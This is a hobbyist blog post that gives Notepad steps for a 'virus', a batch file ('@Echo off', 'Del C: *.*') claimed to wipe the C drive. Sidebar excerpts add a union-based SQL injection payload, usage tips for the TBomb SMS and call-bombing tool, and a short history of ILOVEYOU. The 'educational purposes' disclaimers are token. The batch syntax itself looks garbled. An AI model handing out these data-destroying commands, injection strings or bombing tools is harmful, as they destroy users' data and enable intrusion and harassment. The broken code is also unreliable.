Skip to main content

How to make computer viruses

 How To Create Computer Virus In Few Seconds (Notepad virus tricks)


Learn how to create a computer virus in less than 60 seconds: Almost every computer or laptop user has faced virus attack at least once in their life for sure, and we all know what is virus. Today we are going to describe five ways to create a virus in less than a minute. Go through the post to know about it.



Today we are here with the method to Create a Virus in Less Than 60 seconds. Today in every second, a person is using a computer and almost every one of them knows about a virus. The virus is a malicious program that enters into the computer without your permission and can affect your data and operating system. Well, viruses are of different types as there are trojan horses and much more. However, have you ever thought about creating a virus? You can create one within seconds, and it is possible with some simple methods that I am going to discuss in this post.



1. Creating a Dangerous Virus

Note.  This is only for educational purposes don't misuse ✌ 


Step 1. First of all, in your Windows OS, open the notepad.


Step 2. Now copy and paste the below code in your notepad screen.


@Echo off

Del C: *.* |y


                  


Step 3. Now save this file as virus.bat (you can select any of random name like Niltechno.bat but .bat after that must be there).



Now running the file will delete the C drive completely, and the operating system of the respective computer will get corrupted.


Note: This method is only for knowledge purpose. Don’t try this on your computer as it will completely format your C drive.


Comments

Post a Comment

Popular posts from this blog

SQL Injection Types.

SQL Injection Types: There are various types of SQL Injection. We will consider a few of them below. 1.) Union-based SQL Injection: With the help of the union operators, we can combine the results of two or more SELECT statements to a single output. The return of this single output is a part of the  HTTP response . We can use it to extract data from other tables as well. Example: ‘ AND ‘a’=’b’ UNION SELECT 101, ‘abc’, ‘xyz’ FROM members WHERE ‘a’=’a The  single quote  at the start specifies the end of the original query. The first query must set to  FALSE , hence we specify the condition as ‘a’=’b’ after  AND  function. Both queries that are before and after  UNION  must have the same structure otherwise it will generate an error. It will generate the SQL query after getting the input from the user as: SELECT id, name, description FROM products WHERE category = ” AND ‘a’=’b’ UNION SELECT 101, ‘abc’, ‘xyz’ FROM members WHERE ‘a’=’a’ So it will retu...

SMS bombing, Call Bombing, pranks with friends using termux app

  This is only for educational purposes Don't misuse it  The script requires working network connection to work. No balance will be deducted for using this script to send SMS/calls. While doing infinite bombing use 2-3 seconds delay and 10 to 20 threads for maximum performance. Don't put spaces in between phone number (Ex- 99999 99999) Make sure you are using the latest version of TBomb Make sure you are using Python3. $ python -V If output looks like Python 3 - Congrats, Python 3 is installed properly. 👉 Do not use this to harm others. 👉 This script is only for educational purposes or to prank. 👉 None of the developers/contributors are responsible for the misuse of TBomb. Features: 👉 Lots of integrated SMS/call APIs 👉 Unlimited (Limited against abusing) and super-fast bombing 👉 International bombing available (APIS Dead. Try Your Luck.) 👉 Call bombing 👉 Frequent updates 👉 Automatic updating mechanism 👉 Easy to use and embed in code        ...

Top most dangerous computer viruses 😮😮😲

  1. ILOVEYOU ILOVEYOU is  considered one of the most virulent computer virus ever created . It managed to wreck havoc on computer systems all over the world with around  $10 billion  worth of damages. 10% of the world’s computers were believed to have been infected. It was so bad that governments and large corporations took their  mailing system offline  to prevent infection.  The virus was created by two Filipino programers, Reonel Ramones and Onel de Guzman. What it did was  use social engineering to get people to click on the attachment ; in this case,  a love confession . The attachment was actually a script that poses as a TXT file, due to Windows at the time hiding the actual extension of the file. Once clicked, it will send itself to everyone in the user’s mailing list and proceed to overwrite files with itself, making the computer unbootable. The two were  never charged,  as there were no laws about malware.  This led ...